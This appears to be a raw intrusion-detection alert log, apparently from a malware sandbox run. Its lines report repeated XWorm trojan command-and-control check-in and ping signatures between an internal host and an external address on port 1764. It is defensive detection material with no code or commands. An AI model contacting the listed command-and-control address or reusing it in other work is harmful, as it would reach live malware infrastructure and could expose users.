                                                                                        2024-10-13T19:12:24.997099+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.110595+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.110595+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.124645+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.124645+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.293763+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.293763+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.293998+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.293998+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.455667+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.455667+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.466232+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.466232+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.608734+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.608734+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.678127+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.678127+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.774868+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.774868+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.826062+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.826062+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.895480+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.895480+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.974828+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:25.974828+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.028030+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.028030+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.147160+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.147160+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.209852+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.209852+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.287759+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.287759+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.329015+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.329015+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.407189+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.407189+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.471123+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.471123+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.544504+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.544504+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.607806+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.607806+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.921835+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:26.921835+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.027606+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.027606+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.103934+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.103934+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.199954+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.199954+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.247103+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.247103+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.331825+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.331825+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.378549+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.378549+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.518166+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.518166+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.539594+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.539594+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.662638+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.662638+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.678513+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.678513+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.837997+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.837997+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.853867+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:27.853867+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.048964+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.048964+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.094174+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.094174+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.222540+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.222540+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.256790+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.256790+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.367789+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.367789+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.391549+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.391549+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.506135+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.506135+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.549903+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.549903+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.644140+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.644140+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.687767+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.687767+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.790721+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.790721+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.840124+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.840124+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.958698+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.958698+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.971460+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:28.971460+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:29.101521+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:29.101521+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:29.123963+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:29.123963+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:29.246305+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:29.246305+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.008965+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.008965+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.085857+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.085857+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.150163+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.150163+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.205383+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.205383+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.297031+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.297031+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.369218+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.369218+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.517722+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.517722+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.530430+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.530430+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.648711+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.648711+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.730093+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.730093+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.829401+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.829401+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.875292+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.875292+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.960344+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.960344+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.996382+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:30.996382+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.079511+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.079511+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.160652+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.160652+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.229612+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.229612+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.281282+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.281282+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.348144+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.348144+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.432884+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.432884+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.473253+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.473253+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.564526+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.564526+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.600811+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.600811+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.688421+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.688421+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.720744+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.720744+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.813899+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.813899+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.887983+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.887983+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.956024+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:31.956024+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.041630+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.041630+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.152429+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.152429+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.198571+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.198571+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.291137+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.291137+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.330263+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.330263+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.445535+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.445535+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.490992+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.490992+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.637656+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.637656+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.638674+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.638674+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.794370+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.794370+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.974135+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:32.974135+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
